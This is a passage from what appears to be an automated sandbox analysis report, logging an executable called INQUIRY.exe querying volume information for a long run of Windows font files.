                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
